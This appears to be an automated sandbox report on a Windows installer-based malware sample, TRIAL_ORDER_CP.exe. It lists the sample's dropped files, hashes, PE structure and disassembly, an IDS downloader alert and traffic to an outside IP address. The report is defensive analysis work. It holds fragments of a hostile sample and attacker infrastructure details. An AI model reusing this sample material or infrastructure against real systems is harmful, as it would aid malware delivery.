                                        SHA-256:576D2CD521891CF9C598B3CA0DADB89BD36CDE96B3F86F1CD27BF4FFCCE863CB
                                        SHA-512:28CFECE5E00AAB59758864503F4A9058EEF2FDFC8B73204ABF1E3B41011FBE5D9EAC3595E2EFA0E3B740B82F285B7EC8E42EA5DD42C39E5EFF39735A9C051CBB
                                        Malicious:false
                                        Reputation:low
                                        Preview:.............................>...................a...............................................>...............................Z......2.....................................................................U.................................J.....................................................................A@...Y..C..................1{.......................................................(.....................................................^......................................................V...........5.............................d.................................................+....{............................N........?.......................c.........y.........................................U................................:...................Y..........................................O....................!.......D.................................................}.....................................................................................................".......

                                        C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Crumbliness\tresindstyvendedeles.ord

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):407199
                                        Entropy (8bit):1.2437541055056829
                                        Encrypted:false
                                        SSDEEP:1536:Jm/FJf9qdyY/zMFRdfxHg2jUsscLrP6d2i2SJ:Itlw7zMFHx/jUqOd2SJ
                                        MD5:D2D56C0A1BC3F0AE364C30A638393597
                                        SHA1:B564662188D504D42B22E18A487BF35503B87AF5
                                        SHA-256:E88BB71C91C537060F76CD2EF8633B767BFD720EFD7AF6F8300BA6883249EACB
                                        SHA-512:2756334999CFEE833DAC050193745C85D50A3884FCB18220243C1A71086B51E6FF6EB165189BE7748AABB6098F9BD693EB25E539D2ADE56486FA95CB297FD023
                                        Malicious:false
                                        Reputation:low
                                        Preview:..........................................................=...O}.............C.......................................................................................b..........0.......................................................m...................................................................................................&........-.........D..........................................................%....."......................................................z.......)....................................x............................&..........................................4.....[......V.........................................................=.J..........................................................................................Q.............z........................................................."%F.zt.....................=...............................................A......Y....................f..................................O.......................#.............

                                        C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Roundness.ind

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):385015
                                        Entropy (8bit):1.253279247179919
                                        Encrypted:false
                                        SSDEEP:1536:kVTcKVFuJi5LXKLywcEhXygCilGHIQXMUmMAI:ywKLNLaLywRXygCilGzmMAI
                                        MD5:84182132BEAC6B4CDD42AE3C3504778F
                                        SHA1:9844B9B4ABEAC7B410809A582FE2E41BD38876A3
                                        SHA-256:5A2A01A88EC9FF56B80D957E4C5891A020435407F81DADA05DE58165C0C86F2D
                                        SHA-512:054C17E8AC2EDED927F24E77A81FBA74498C9F3ABD07F5E42D6F9E20A58D47D9C30FF1060CC8626DE93FDD5BBA2A0503FF61EC7F4F70858871C15E63DDC48A7F
                                        Malicious:false
                                        Preview:....E..........;................../..r.....5...............e......9...............................S............................................e..........................E..........................W.................................8....................j......3....................X............................Ql....T.................>g...'.............[...l...P.................................|................................q.....................3........v......t....H............................................s.................................................................................................................................................f....................................................................(..................................................;..$..................................................................o.-.........................................................l................. ...............................................Q......................

                                        C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\bucrane.erh

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):186880
                                        Entropy (8bit):1.2601075629320995
                                        Encrypted:false
                                        SSDEEP:768:597pZQKUv2av3tuZ8qbY2vFhkyd8MBkwaKKKbwspvRxtm8dBct2pEW5x1dGkrKLB:Ve2aPPET8MOwaKGeR//1T9dO
                                        MD5:AA2CD52ABEA96B7E317691ADD713125D
                                        SHA1:B34046DE9D9A275896762FD53A2DFF2D382EAE56
                                        SHA-256:C6AD2DCC3B851E06A60FA705CBAA83AADBEC68B10E24CA667088E8153973A7B2
                                        SHA-512:AD454262C5804887A9596D5CFFCC64D86EB1ED92813A5A37F57D9FCCA21D9C2EF465E51F05879F65BABA7752252B9FEC6352CFB5F678B21D3412B6906EB07C26
                                        Malicious:false
                                        Preview:..N......................p..........................................%.............................................................V.............z.N........................i......................................................................................................,(^.............b..n.....&...........................S..................>...................C.................................~...........................K.......................................B.....*..........L.....................j..............!...........O................S................a....C......x...y................................@..............................$...........................................N.........................g.................R...................................@.....................F...........+............................S..........R..............................................g.........................................................................................................

                                        C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\freemanship.txt

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:ASCII text, with very long lines (304), with no line terminators
                                        Category:dropped
                                        Size (bytes):304
                                        Entropy (8bit):4.14301130689188
                                        Encrypted:false
                                        SSDEEP:6:3CUzIrGx4igCDYUuTjAtLGafWWl2iEOQkAtj/jLsTzOwJT4HCALn:3CCF4igCDYA5Ga+Wl2iEOTAJryO8MHCu
                                        MD5:EF6FDEDE5EA8DBEF391FEC35BE82A5FC
                                        SHA1:6C88262F78E8B11651EEB6534F09C65CD0A8F8BB
                                        SHA-256:37B39724FD3B7FE48E1D65DA1A69BF4DBF809F34C67BAC7C4DA13F93DA9BE856
                                        SHA-512:5FB53ADEADB7C464A13EEECE64ADD35F972425D55447FFB84A277689BA3F4D5861A43B2883CB0744F98F164F2802C567F9969F777B98CE4609D28A64ED1101FD
                                        Malicious:false
                                        Preview:skydestigens dilettanist defmrkers,drmmene sprometrets taklingens crokinole ligegladestes,ultraremuneration dkketallerkners uncustomed filoversigterne.atomize koncentrationsevnens arthropodal epilepsis vakuums stabelvis lnregulering,catv skrivemaskinebordenes skydningerne.solanin godkendelsens gasogene.

                                        C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\gennemprvning.Aut

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):109610
                                        Entropy (8bit):2.6617579967489884
                                        Encrypted:false
                                        SSDEEP:1536:FgW5xMFGTVJF+21miQeKdFwpo0Vv0Qs5w110FkLpTEO7:vrsD6
                                        MD5:88A948F41E25F333CA29D74A18275335
                                        SHA1:352EDF6A66228CBE4161DBB104CE3F515613E285
                                        SHA-256:6DD15FC1E2E38CDE46A9D729A3390A20548E91BF4EE72441EF72DE008ABF279F
                                        SHA-512:C1189DF2FB7DACEB3B5C31FFED37D8DD3479CE6E1E553EC9846AE114079FC368A509BFA04FED721FACB04E6327C8AD2D1D1A7E566C8EC67815C5F84E84E6C49E
                                        Malicious:false
                                        Preview:0000006D6D6D0000797979006767670000BCBC00E7E7E700F70072000048480000EAEA0000000000000065650021007B7B7B7B7B7B000000D80000AE000000BE00C80000830000FCFC00006F6F0000C20026000000ABAB00D9D9D9D900C3C3C3C3C3C300F3F3006400006E00B8B8B8B800EA000000000000910000860000009500008A8A00C6002D0000CBCB007E7E0006000005050505050500F9F9000000A6A6A6A6A6A6A60000000000B50000A3A30000000000BA0000D40000007E7E7E00A3002E0000A30000A5006A6A00009B9B9B9B000000DA00AA0000490000007E7E00EFEF00000000000000F600000075000000B300151515000043434343430000000000009D9D0000006B00870091910000D400D0D00000130091910000005C00000074747400000A008000A500000000141414141414005D002F00A1A10000000000DFDF000E000000A7A7000000ADADAD0000F7008787870000A4006E0000000000E7008F0000282800FA0000000000003A00C200ECECECECECECECEC00A0A0000000006D6D6D0000007F7F00000082000A0A00C800000000CA00001600002727005C00BCBCBC00C4C40000000000BF00BBBBBB00C8C8C8C800A1A1001C1C00001700700038000000000000006A0000A300002A00003C3C00B40000C0008484840000FD00E500AE000000003A000000A5A50084

                                        C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\persuadingly.Tam

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):301874
                                        Entropy (8bit):7.574773877850153
                                        Encrypted:false
                                        SSDEEP:6144:CUAmWaqUDpmX7a2orEMWgWLkuoJguBP0YI:YmxqsccIsJguBPtI
                                        MD5:254D4AABCCC8E28A203C152E4826A86A
                                        SHA1:25B5F293B8A76CC17836D26924B42385F4BD6584
                                        SHA-256:6034CCD53FF6AAB2850028AED103E16BBF997A780AD74C93AE9AFE188536DC3E
                                        SHA-512:0CCD5D3E8F51A2675112F673A6D102A1072B74726C0AE43FC0F95A7D7864011B2F8956D4EFF9DC6CA51997F6E41930467A55FFC048165D811C86B8D572FC1DDD
                                        Malicious:false
                                        Preview:.uu.m....//////............,..ooo..QQ....W.......}}........~...............d......}}...'..........................r...s.f.JJ.z...............B.(..88............666...).....}}.....BBB.....p...{.....OO.....................R............P..{{{{...M.......h........ ......++...2...}...ww...b...........ii.......................```..................999......SSS............ZZZ...II...............................///.,........................................v.....EE........v...-.............................................>>........_..............................6.UU........................@.......bbbb....).............*...n.7777....[..d.........J...........?.....z.....!........::..cc..........I.........mmmm......................................}....III......KKKKKK.................d.GGG..............L...*....GGGG.P.qq.........g.....!!.......................[..E. ..............................[...U............E..V......r......................................p...UU...A.b......................===...

                                        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\LangDLL.dll

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):5632
                                        Entropy (8bit):3.817430038996001
                                        Encrypted:false
                                        SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                        MD5:549EE11198143574F4D9953198A09FE8
                                        SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                        SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                        SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: Thermo Fisher RFQ_TFS-1805.xls, Detection: malicious, Browse
                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):12288
                                        Entropy (8bit):5.804946284177748
                                        Encrypted:false
                                        SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                        MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                        SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                        SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                        SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: Thermo Fisher RFQ_TFS-1805.xls, Detection: malicious, Browse
                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
                                        • Filename: AKgHw6grDP.exe, Detection: malicious, Browse
                                        • Filename: AKgHw6grDP.exe, Detection: malicious, Browse
                                        • Filename: PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\UserInfo.dll

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):4096
                                        Entropy (8bit):3.3415738744933092
                                        Encrypted:false
                                        SSDEEP:48:qK5HC+J4apHT1wH8l9QcXygHg0ZShMmj3jk6TbGr7X:5QiRzuHOXTA0H6jk6nGr7X
                                        MD5:F8B6DD1F9620BE4EF2AD1E81FB6B79FA
                                        SHA1:F06C8C8650335BACE41C8DBE73307CBE4E61B3B1
                                        SHA-256:A921CC9CC4AF332BE96186D60D2539CB413DFA44CFD73E85687F9338505FF85E
                                        SHA-512:F15811088ECDE4CD0C038DB2C278B7214E41728E382B25C65C2EB491BC0379C075841398E8C99E8CCEBA8BE7E8342BC69D35836EBE9B12EBEBFF48D01D5FA61A
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsDialogs.dll

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):9728
                                        Entropy (8bit):5.157714967617029
                                        Encrypted:false
                                        SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                        MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                        SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                        SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                        SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsExec.dll

                                        Download File
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):7168
                                        Entropy (8bit):5.295306975422517
                                        Encrypted:false
                                        SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                        MD5:11092C1D3FBB449A60695C44F9F3D183
                                        SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                        SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                        SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):6.813518603963732
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:TRIAL_ORDER_CP.exe
                                        File size:1'014'480 bytes
                                        MD5:5a14d64b70fc7106cb6c14be1aaa7482
                                        SHA1:0612c6f0f1aa18f6e96de3d7ae39193981d9bb95
                                        SHA256:bdd5b953bef085550bb5891e8d3c7248b5b16fcbba1bb26e2be18c4801d1a98e
                                        SHA512:9f8075010e5f4b8a4dcac7a4fda9a947459ffaf29c34a454a0f94c749703f28d734b39b2a6359de6a1a067d0551927cfecc39610427277ef26c4eb83fe67def7
                                        SSDEEP:12288:RGUeTvuO1BJdtGrY8dMLMankl6QQGMi7B1mSwIhCjVn:RGPB4Y8d2JKpQWB1mSlCjV
                                        TLSH:28259EA3E44CA2A1D4E98F73E20B76B705371DB595560013A2D1BF273AF9C23467392B
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:....

                                        File Icon

                                        Icon Hash:d96236594b352501

                                        Static PE Info

                                        General

                                        Entrypoint:0x40352f
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x660843EA [Sat Mar 30 16:55:06 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                        Entrypoint Preview

                                        Instruction
                                        sub esp, 000003F8h
                                        push ebp
                                        push esi
                                        push edi
                                        push 00000020h
                                        pop edi
                                        xor ebp, ebp
                                        push 00008001h
                                        mov dword ptr [esp+20h], ebp
                                        mov dword ptr [esp+18h], 0040A2D8h
                                        mov dword ptr [esp+14h], ebp
                                        call dword ptr [004080A4h]
                                        mov esi, dword ptr [004080A8h]
                                        lea eax, dword ptr [esp+34h]
                                        push eax
                                        mov dword ptr [esp+4Ch], ebp
                                        mov dword ptr [esp+0000014Ch], ebp
                                        mov dword ptr [esp+00000150h], ebp
                                        mov dword ptr [esp+38h], 0000011Ch
                                        call esi
                                        test eax, eax
                                        jne 00007F48392309BAh
                                        lea eax, dword ptr [esp+34h]
                                        mov dword ptr [esp+34h], 00000114h
                                        push eax
                                        call esi
                                        mov ax, word ptr [esp+48h]
                                        mov ecx, dword ptr [esp+62h]
                                        sub ax, 00000053h
                                        add ecx, FFFFFFD0h
                                        neg ax
                                        sbb eax, eax
                                        mov byte ptr [esp+0000014Eh], 00000004h
                                        not eax
                                        and eax, ecx
                                        mov word ptr [esp+00000148h], ax
                                        cmp dword ptr [esp+38h], 0Ah
                                        jnc 00007F4839230988h
                                        and word ptr [esp+42h], 0000h
                                        mov eax, dword ptr [esp+40h]
                                        movzx ecx, byte ptr [esp+3Ch]
                                        mov dword ptr [007A8318h], eax
                                        xor eax, eax
                                        mov ah, byte ptr [esp+38h]
                                        movzx eax, ax
                                        or eax, ecx
                                        xor ecx, ecx
                                        mov ch, byte ptr [esp+00000148h]
                                        movzx ecx, cx
                                        shl eax, 10h
                                        or eax, ecx
                                        movzx ecx, byte ptr [esp+0000004Eh]

                                        Rich Headers

                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d70000x6a4e0.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x66d10x68001cb1571d2754df0a2b7df66b1b8d9089False0.6727388822115384data6.4708065613184305IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xa0000x39e3780x60092e7d2d711bd61815cb4cc2d30d795b1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata0x3a90000x2e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x3d70000x6a4e00x6a60050c6a3b5a9739b53779ab9f1abcff9d3False0.20903716216216217data4.214291608698191IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x3d73b80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.16116445246619523
                                        RT_ICON0x4193e00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.22898675026617768
                                        RT_ICON0x429c080x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3017658187933572
                                        RT_ICON0x4330b00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.32804990757855823
                                        RT_ICON0x4385380x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3040269248937175
                                        RT_ICON0x43c7600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.38724066390041495
                                        RT_ICON0x43ed080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.42120075046904315
                                        RT_ICON0x43fdb00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.43688524590163935
                                        RT_ICON0x4407380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5859929078014184
                                        RT_DIALOG0x440ba00xb8dataEnglishUnited States0.6467391304347826
                                        RT_DIALOG0x440c580x144dataEnglishUnited States0.5216049382716049
                                        RT_DIALOG0x440da00x100dataEnglishUnited States0.5234375
                                        RT_DIALOG0x440ea00x11cdataEnglishUnited States0.6056338028169014
                                        RT_DIALOG0x440fc00x60dataEnglishUnited States0.7291666666666666
                                        RT_GROUP_ICON0x4410200x84dataEnglishUnited States0.7196969696969697
                                        RT_VERSION0x4410a80x1a8dataEnglishUnited States0.5660377358490566
                                        RT_MANIFEST0x4412500x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5625

                                        Imports

                                        DLLImport
                                        ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                        SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                        ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                        COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                        USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                        GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                        KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                        2024-08-28T12:25:21.088617+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa24986580192.168.11.2038.242.218.41

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 28, 2024 12:25:20.714098930 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:20.898994923 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:20.899276972 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:20.899656057 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.084317923 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.088315964 CEST804986538.242.218.41192.168.11.20
